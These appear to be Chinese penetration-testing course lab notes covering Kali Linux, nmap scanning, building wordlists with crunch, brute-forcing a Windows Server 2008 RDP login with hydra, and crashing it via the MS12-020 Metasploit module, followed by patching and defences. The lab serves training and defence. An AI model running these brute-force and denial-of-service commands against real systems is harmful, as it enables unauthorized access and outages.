1、什么是Kali
Kali系统,全名为Kali Linux,为渗透测试和网络安全领域提供一个全面的工具集合。
2、作用
Kali系统预装了各种用于渗透测试和漏洞利用的工具,包括端口扫描、密码破解、网络嗅探、漏洞分析等。这些工具可以帮助安全专业人员评估和测试网络的安全性,以及发现可能存在的漏洞和弱点。
二、信息收集
1、信息的收集
信息收集是指通过各种方式获取所需要的信息,信息收集是信息利用的第一步,也是最关键的一步。
例如:小偷的踩点、APP的注册账号、APP获取物理位置,这些情况都属于信息的收集
2、信息分类
信息分类分为两类,原始信息和加工信息两大类
注释:
原始信息:通过信息收集,得到的最初的信息
加工信息:属于一种分析行为,加工信息是在原始信息的基础上得出的
3、信息收集的对象
备注:在图片中的其他信息收集的行为,在后续的学习过程当中会给大家信息详细讲解
三、NMAP扫描
1、什么是扫描
扫描指的是用工具或者软件来探测目标网络或者主机的过程
2、扫描的作用
3、扫描的用途
4、怎么用NMAP扫描工具
nmap + IP地址
注释:什么是IP地址?相当于计算机/网络设备的家庭住址,设备和设备之间通信必然需要IP地址
(将会陪伴我们整个职场生涯的知识点)
########################## 实验一(NMAP扫描)###########################
kali 用户名:kali 密码:123456
Win 2008 用户名:administrator 密码:Tedu.cn123
(如果密码不对,就去学校给大家创建的快照管理器中查看)
1、获取IP地址信息
kaLi:ifconfig //查询IP地址信息
WIn:ipconfig //查询IP地址信息(Win键+R进入到运行界面——cmd)
2、测试网络的连通性
ping +对方的IP地址 例如:ping 192.168.10.100
注意:如果无法ping通,将2008的防火墙关闭即可
3、在Windows Server 2008上进行操作
① 开启2008设备中的远程控制
此电脑——右击属性——远程控制——选择允许
netstat -an //查看端口开放情况(主要看3389端口是否在开启状态)
4、进行扫描
nmap +对方的IP地址 例如:nmap 192.168.64.131
四、暴力破解
1、什么是暴力破解
指使用各种密码组合反复进行验证,直到找出正确的密码
也称之为“密码穷举”,所用于密码攻击领域
从理论上来说,任何密码都可以用这种方法来破解,只不过越复杂的密码需要的破解时间也越长
注释:
密码复杂性(四分之三原则):大写字母、小写字母、数字、符号,四项中遵循其中三项即可
例如:Taren1
测试密码破解的网址:https://www.security.org/how-secure-is-my-password/
2、什么是密码字典
指用来尝试的所有密码的集合
3、创建密码字典
例如:crunch 8 8 Abc123456 -o pass.txt
4、暴力破解
########################## 实验二(暴力破解)###########################
1、修改Windows Server 2008的密码,例如:Ab12
虚拟机上方菜单栏“虚拟机”→ Ctrl+Alt+Delete→ 更改密码
注意:这一步主要是为了能够缩短破解的时间,让大家快速看到效果(旧密码:Tedu.cn123)
2、创建密码字典
crunch 3 4 Abc123 -o pass.txt
注意:密码字典中要包含2008的密码,否则密码破解失败
3、暴力破解
hydra -l administrator -P pass.txt 192.168.10.1 rdp
————————————————————————————————————————
暴力破解实验的排错思路:配置思路就是排错思路
五、如何防范暴力破解
关闭3389端口(治标不治本)
开启系统防火墙
部署终端安全管理系统或终端应急响应系统
六、系统漏洞
1、概述
是指应用程序或者操作系统存在缺陷或错误,黑客利用这个缺陷或错误植入木马、病毒来攻击或控制我们的电脑,从而窃取我们电脑中的重要资料和信息,破坏我们的系统。
2、漏洞的危害
隐私泄露、财产损失、服务器瘫痪、网络瘫痪....... 漏洞披露平台
#################### 实验一(环境准备) ####################
1、登录到设备当中
kali:用户名(kali),密码(123456)
有些同学的电脑密码不是123456,就是kali
Win 2008:用户名(Administrator),密码(Tedu.cn123)
2、在Win 2008的3389端口开启
① 此电脑——右击属性——远程管理——选择“允许..........的计算机连接”
② Win+R——netstat -an 查看端口开放情况
3、让攻击机和靶机实现网络互通
① kali:ifconfig //查询IP地址
② Win 2008: ipconfig //查询IP地址
两台虚拟机中实现ping通操作
排错思路: 1、关闭Win2008设备中的防火墙 网络——右击属性——Windows 防火墙——启用/关闭防火墙——网络全部选择关闭 2、 查看两台虚拟机是否是相同网络的设备 ,如果不是更改Win 2008的IP地址为跟kali相同的网段
4、在kali设备中扫描对方设备的漏洞
nmap 对方设备的IP地址 例如:nmap 192.168.64.128 //扫描对方设备的漏洞
nmap 192.168.64.0/24 //扫描网络中的主机以及对应的漏洞信息
5、实施漏洞攻击
msfconsole //进入攻击平台
search ms12-020 //查询攻击ms12-020的攻击工具有哪些
use 0 //使用攻击工具
set rhosts 192.168.64.128 //攻击远程主机192.168.64.128
run //运行
结果:Win 2008设备蓝屏瘫痪
排错思路:配置思路就是排错思路 1、确保WIn 2008设备中的远程端口3389是开启状态 netstat -an 2、检查虚拟机之间的网络连通性,如果不通,执行以下操作 ① 关闭Win2008设备中的防火墙 网络——右击属性——Windows 防火墙——启用/关闭防火墙——网络全部选择关闭 ② 查看两台虚拟机是否是相同网络的设备,如果不是更改Win 2008的IP地址为跟kali相同的网段 3、检查kali是否可以发现对方的3389端口状态,namp 对方的IP地址 —— 3389没有开启 —— 设备不通 4、实施漏洞攻击 —— 命令拼错了 —— 命令没有敲空格 —— IP地址看是否是2008设备的IP地址
#################### 实验二(设备打补丁) ####################
1、Win 2008 设备上的补丁情况
Win+R——cmd——systeminfo
查询结果:没有Windows6.1-KB2621440-x64(针对ms12-020漏洞的补丁)
2、给Win 2008 打补丁
X:\NTD2023_tools\D模块软件素材\10_PENTEST\Win2008补丁\Windows6.1-KB2621440-x64
将补丁复制到虚拟机中,双击进行安装
安装后需要重启才能生效
3、再次去查看Win 2008的补丁情况
Win+R——cmd——systeminfo
查询结果:已经成功安装Windows6.1-KB2621440-x64(针对ms12-020漏洞的补丁)
4、用kali再次去针对Win 2008展开漏洞攻击
msfconsole //进入攻击平台 search ms12-020 //查询攻击ms12-020的攻击工具有哪些 use 0 //使用攻击工具 set rhosts 192.168.64.128 //攻击远程主机192.168.64.128 run //运行
攻击结果:Win 2008不会蓝屏